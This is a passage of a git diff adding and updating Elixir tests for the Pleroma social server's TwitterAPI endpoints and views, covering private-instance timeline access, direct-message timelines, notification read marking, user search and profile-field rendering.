Pleroma.Web.TwitterAPI.ControllerTest do conn = conn_with_creds |> post(request_path, %{status: " "}) assert json_response(conn, 400) == error_response - conn = conn_with_creds |> post(request_path, %{status: "Nice meme."}) + # we post with visibility private in order to avoid triggering relay + conn = conn_with_creds |> post(request_path, %{status: "Nice meme.", visibility: "private"}) assert json_response(conn, 200) == ActivityRepresenter.to_map(Repo.one(Activity), %{user: user}) @@ -99,6 +100,56 @@ defmodule Pleroma.Web.TwitterAPI.ControllerTest do assert length(response) == 10 end + + test "returns 403 to unauthenticated request when the instance is not public" do + instance = + Application.get_env(:pleroma, :instance) + |> Keyword.put(:public, false) + + Application.put_env(:pleroma, :instance, instance) + + conn + |> get("/api/statuses/public_timeline.json") + |> json_response(403) + + instance = + Application.get_env(:pleroma, :instance) + |> Keyword.put(:public, true) + + Application.put_env(:pleroma, :instance, instance) + end + + test "returns 200 to unauthenticated request when the instance is public" do + conn + |> get("/api/statuses/public_timeline.json") + |> json_response(200) + end + end + + describe "GET /statuses/public_and_external_timeline.json" do + test "returns 403 to unauthenticated request when the instance is not public" do + instance = + Application.get_env(:pleroma, :instance) + |> Keyword.put(:public, false) + + Application.put_env(:pleroma, :instance, instance) + + conn + |> get("/api/statuses/public_and_external_timeline.json") + |> json_response(403) + + instance = + Application.get_env(:pleroma, :instance) + |> Keyword.put(:public, true) + + Application.put_env(:pleroma, :instance, instance) + end + + test "returns 200 to unauthenticated request when the instance is public" do + conn + |> get("/api/statuses/public_and_external_timeline.json") + |> json_response(200) + end end describe "GET /statuses/show/:id.json" do @@ -220,6 +271,43 @@ defmodule Pleroma.Web.TwitterAPI.ControllerTest do end end + describe "GET /statuses/dm_timeline.json" do + test "it show direct messages", %{conn: conn} do + user_one = insert(:user) + user_two = insert(:user) + + {:ok, user_two} = User.follow(user_two, user_one) + + {:ok, direct} = + CommonAPI.post(user_one, %{ + "status" => "Hi @#{user_two.nickname}!", + "visibility" => "direct" + }) + + {:ok, direct_two} = + CommonAPI.post(user_two, %{ + "status" => "Hi @#{user_one.nickname}!", + "visibility" => "direct" + }) + + {:ok, _follower_only} = + CommonAPI.post(user_one, %{ + "status" => "Hi @#{user_two.nickname}!", + "visibility" => "private" + }) + + # Only direct should be visible here + res_conn = + conn + |> assign(:user, user_two) + |> get("/api/statuses/dm_timeline.json") + + [status, status_two] = json_response(res_conn, 200) + assert status["id"] == direct_two.id + assert status_two["id"] == direct.id + end + end + describe "GET /statuses/mentions.json" do setup [:valid_user] @@ -280,6 +368,56 @@ defmodule Pleroma.Web.TwitterAPI.ControllerTest do end end + describe "POST /api/qvitter/statuses/notifications/read" do + setup [:valid_user] + + test "without valid credentials", %{conn: conn} do + conn = post(conn, "/api/qvitter/statuses/notifications/read", %{"latest_id" => 1_234_567}) + assert json_response(conn, 403) == %{"error" => "Invalid credentials."} + end + + test "with credentials, without any params", %{conn: conn, user: current_user} do + conn = + conn + |> with_credentials(current_user.nickname, "test") + |> post("/api/qvitter/statuses/notifications/read") + + assert json_response(conn, 400) == %{ + "error" => "You need to specify latest_id", + "request" => "/api/qvitter/statuses/notifications/read" + } + end + + test "with credentials, with params", %{conn: conn, user: current_user} do + other_user = insert(:user) + + {:ok, _activity} = + ActivityBuilder.insert(%{"to" => [current_user.ap_id]}, %{user: other_user}) + + response_conn = + conn + |> with_credentials(current_user.nickname, "test") + |> get("/api/qvitter/statuses/notifications.json") + + [notification] = response = json_response(response_conn, 200) + + assert length(response) == 1 + + assert notification["is_seen"] == 0 + + response_conn = + conn + |> with_credentials(current_user.nickname, "test") + |> post("/api/qvitter/statuses/notifications/read", %{"latest_id" => notification["id"]}) + + [notification] = response = json_response(response_conn, 200) + + assert length(response) == 1 + + assert notification["is_seen"] == 1 + end + end + describe "GET /statuses/user_timeline.json" do setup [:valid_user] @@ -1080,4 +1218,20 @@ defmodule Pleroma.Web.TwitterAPI.ControllerTest do assert relationship["follows_you"] == false end end + + describe "GET /api/pleroma/search_user" do + test "it returns users, ordered by similarity", %{conn: conn} do + user = insert(:user, %{name: "eal"}) + user_two = insert(:user, %{name: "ean"}) + user_three = insert(:user, %{name: "ebn"}) + + resp = + conn + |> get(twitter_api_search__path(conn, :search_user), query: "eal") + |> json_response(200) + + assert length(resp) == 3 + assert [user.id, user_two.id, user_three.id] == Enum.map(resp, fn %{"id" => id} -> id end) + end + end end diff --git a/test/web/twitter_api/twitter_api_test.exs b/test/web/twitter_api/twitter_api_test.exs index 6486540f8..8b9920bd9 100644 --- a/test/web/twitter_api/twitter_api_test.exs +++ b/test/web/twitter_api/twitter_api_test.exs @@ -48,7 +48,7 @@ defmodule Pleroma.Web.TwitterAPI.TwitterAPITest do "https://www.w3.org/ns/activitystreams#Public" ) - assert Enum.member?(get_in(activity.data, ["cc"]), "shp") + assert Enum.member?(get_in(activity.data, ["to"]), "shp") assert activity.local == true assert %{"moominmamma" => "http://localhost:4001/finmoji/128px/moominmamma-128.png"} = diff --git a/test/web/twitter_api/views/activity_view_test.exs b/test/web/twitter_api/views/activity_view_test.exs index a101e4ae8..5cef06f88 100644 --- a/test/web/twitter_api/views/activity_view_test.exs +++ b/test/web/twitter_api/views/activity_view_test.exs @@ -36,6 +36,10 @@ defmodule Pleroma.Web.TwitterAPI.ActivityViewTest do "favorited" => false, "id" => activity.id, "in_reply_to_status_id" => nil, + "in_reply_to_screen_name" => nil, + "in_reply_to_user_id" => nil, + "in_reply_to_profileurl" => nil, + "in_reply_to_ostatus_uri" => nil, "is_local" => true, "is_post_verb" => true, "possibly_sensitive" => false, @@ -126,6 +130,33 @@ defmodule Pleroma.Web.TwitterAPI.ActivityViewTest do assert result == expected end + test "a like activity for deleted post" do + user = insert(:user) + other_user = insert(:user, %{nickname: "shp"}) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "Hey @shp!"}) + {:ok, like, _object} = CommonAPI.favorite(activity.id, other_user) + CommonAPI.delete(activity.id, user) + + result = ActivityView.render("activity.json", activity: like) + + expected = %{ + "activity_type" => "like", + "created_at" => like.data["published"] |> Utils.date_to_asctime(), + "external_url" => like.data["id"], + "id" => like.id, + "in_reply_to_status_id" => nil, + "is_local" => true, + "is_post_verb" => false, + "statusnet_html" => "shp favorited a status.", + "text" => "shp favorited a status.", + "uri" => "tag:#{like.data["id"]}:objectType=Favourite", + "user" => UserView.render("show.json", user: other_user) + } + + assert result == expected + end + test "an announce activity" do user = insert(:user) other_user = insert(:user, %{nickname: "shp"}) diff --git a/test/web/twitter_api/views/user_view_test.exs b/test/web/twitter_api/views/user_view_test.exs index 24a5c5bca..2c583c0d3 100644 --- a/test/web/twitter_api/views/user_view_test.exs +++ b/test/web/twitter_api/views/user_view_test.exs @@ -13,6 +13,13 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do [user: user] end + test "A user with only a nickname", %{user: user} do + user = %{user | name: nil, nickname: "scarlett@catgirl.science"} + represented = UserView.render("show.json", %{user: user}) + assert represented["name"] == user.nickname + assert represented["name_html"] == user.nickname + end + test "A user with an avatar object", %{user: user} do image = "image" user = %{user | avatar: %{"url" => [%{"href" => image}]}} @@ -22,7 +29,7 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do test "A user with emoji in username", %{user: user} do expected = - "<img height='32px' width='32px' alt='karjalanpiirakka' title='karjalanpiirakka' src='/file.png' /> man" + "<img height=\"32px\" width=\"32px\" alt=\"karjalanpiirakka\" title=\"karjalanpiirakka\" src=\"/file.png\" /> man" user = %{ user @@ -87,7 +94,9 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do "background_image" => nil, "is_local" => true, "locked" => false, - "default_scope" => "public" + "default_scope" => "public", + "no_rich_text" => false, + "fields" => [] } assert represented == UserView.render("show.json", %{user: user}) @@ -126,7 +135,9 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do "background_image" => nil, "is_local" => true, "locked" => false, - "default_scope" => "public" + "default_scope" => "public", + "no_rich_text" => false, + "fields" => [] } assert represented == UserView.render("show.json", %{user: user, for: follower}) @@ -166,7 +177,9 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do "background_image" => nil, "is_local" => true, "locked" => false, - "default_scope" => "public" + "default_scope" => "public", + "no_rich_text" => false, + "fields" => [] } assert represented == UserView.render("show.json", %{user: follower, for: user}) @@ -213,10 +226,38 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do "background_image" => nil, "is_local" => true, "locked" => false, - "default_scope" => "public" + "default_scope" => "public", + "no_rich_text" => false, + "fields" => [] } blocker = Repo.get(User, blocker.id) assert represented == UserView.render("show.json", %{user: user, for: blocker}) end + + test "a user with mastodon fields" do + fields = [ + %{ + "name" => "Pronouns", + "value" => "she/her" + }, + %{ + "name" => "Website", + "value" => "https://example.org/" + } + ] + + user = + insert(:user, %{ + info: %{ + "source_data" => %{ + "attachment" => + Enum.map(fields, fn field -> Map.put(field, "type", "PropertyValue") end) + } + } + }) + + userview = UserView.render("show.json", %{user: user}) + assert userview["fields"] == fields + end end |